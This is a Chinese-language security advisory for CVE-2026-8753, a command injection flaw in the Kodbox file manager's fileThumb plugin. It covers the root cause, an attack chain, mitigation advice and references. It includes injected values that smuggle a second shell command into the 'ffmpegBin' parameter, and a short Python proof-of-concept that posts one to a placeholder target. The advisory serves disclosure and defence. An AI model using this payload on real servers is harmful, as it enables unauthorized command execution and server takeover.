CVE-2026-8753 CVSS 6.3 中危

CVE-2026-8753: Kodbox文件缩略图插件远程命令注入漏洞

披露日期: 2026-05-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8753

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

kalcaddle Kodbox

漏洞概述

kalcaddle Kodbox是Kalcaddle公司开发的一款Web文件管理器。在1.64及之前的版本中，其fileThumb插件存在安全漏洞。具体来说，文件VideoResize.class.php中的parseVideoInfo函数在处理ffmpegBin参数时缺乏有效的过滤，导致攻击者可以通过操纵该参数执行任意系统命令。由于该组件无需复杂交互即可被远程触发，且攻击代码已公开，这对运行受影响版本的服务器构成了中等风险的安全威胁。

技术细节

该漏洞的根源在于Kodbox的fileThumb插件未能正确区分配置参数和用户输入。在VideoResize.class.php文件的parseVideoInfo函数中，代码直接使用了ffmpegBin参数来构建执行FFmpeg视频处理的命令字符串。由于缺乏对特殊字符的转义处理，攻击者可以将恶意的Shell命令拼接进原本的FFmpeg路径中。例如，通过将ffmpegBin设置为/usr/bin/ffmpeg; id，系统在执行时会先运行FFmpeg，随后执行id命令。由于漏洞允许远程发起攻击且无需用户交互，一旦攻击者获得了低权限账户，即可利用此漏洞在服务器后台执行任意代码，进而可能导致服务器被完全控制、敏感数据泄露或作为跳板攻击内网其他系统。

攻击链分析

STEP 1

侦察

攻击者识别目标服务器运行的是Kodbox文件管理器，且版本低于或等于1.64。

STEP 2

漏洞利用

攻击者构造包含恶意参数的HTTP请求，向fileThumb插件的视频处理接口发送请求，将ffmpegBin参数修改为包含Shell元字符的命令字符串。

STEP 3

命令执行

服务器端的VideoResize.class.php未对参数进行过滤，直接将其拼接到系统命令中执行，导致攻击者的恶意命令在服务器上运行。

STEP 4

后果达成

攻击者成功获取服务器权限，可能进一步窃取数据、植入后门或横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example, adjust based on actual deployment)
target_url = "http://target-ip/index.php/plugin/thumb/video"

# Attacker controlled command payload
# The vulnerable parameter 'ffmpegBin' is manipulated to inject system commands
payload = "/usr/bin/ffmpeg; whoami"

# Data to send (Structure might vary depending on the actual request implementation)
data = {
    "path": "/path/to/video.mp4",
    "ffmpegBin": payload
}

try:
    response = requests.post(target_url, data=data)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except Exception as e:
    print(f"Error: {e}")

影响范围

kalcaddle Kodbox <= 1.64

防御指南

临时缓解措施

建议立即检查Kodbox版本，若在受影响范围内，请暂时禁用fileThumb插件以阻断攻击路径。同时，应检查服务器日志中是否存在对VideoResize.class.php的异常调用记录。在代码层面，建议对ffmpegBin参数实施白名单验证，确保其仅指向预设的合法二进制文件路径，禁止包含分号、管道符等Shell特殊字符。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8753
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8753
3 Details https://www.cvedetails.com/cve/CVE-2026-8753/
4 VulDB https://vuldb.com/cve/CVE-2026-8753
5 Link https://vuldb.com/submit/810109
6 Link https://vuldb.com/vuln/364380
7 Link https://vuldb.com/vuln/364380/cti
8 Link https://vulnplus-note.wetolink.com/share/R0hHqwMywhsm

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表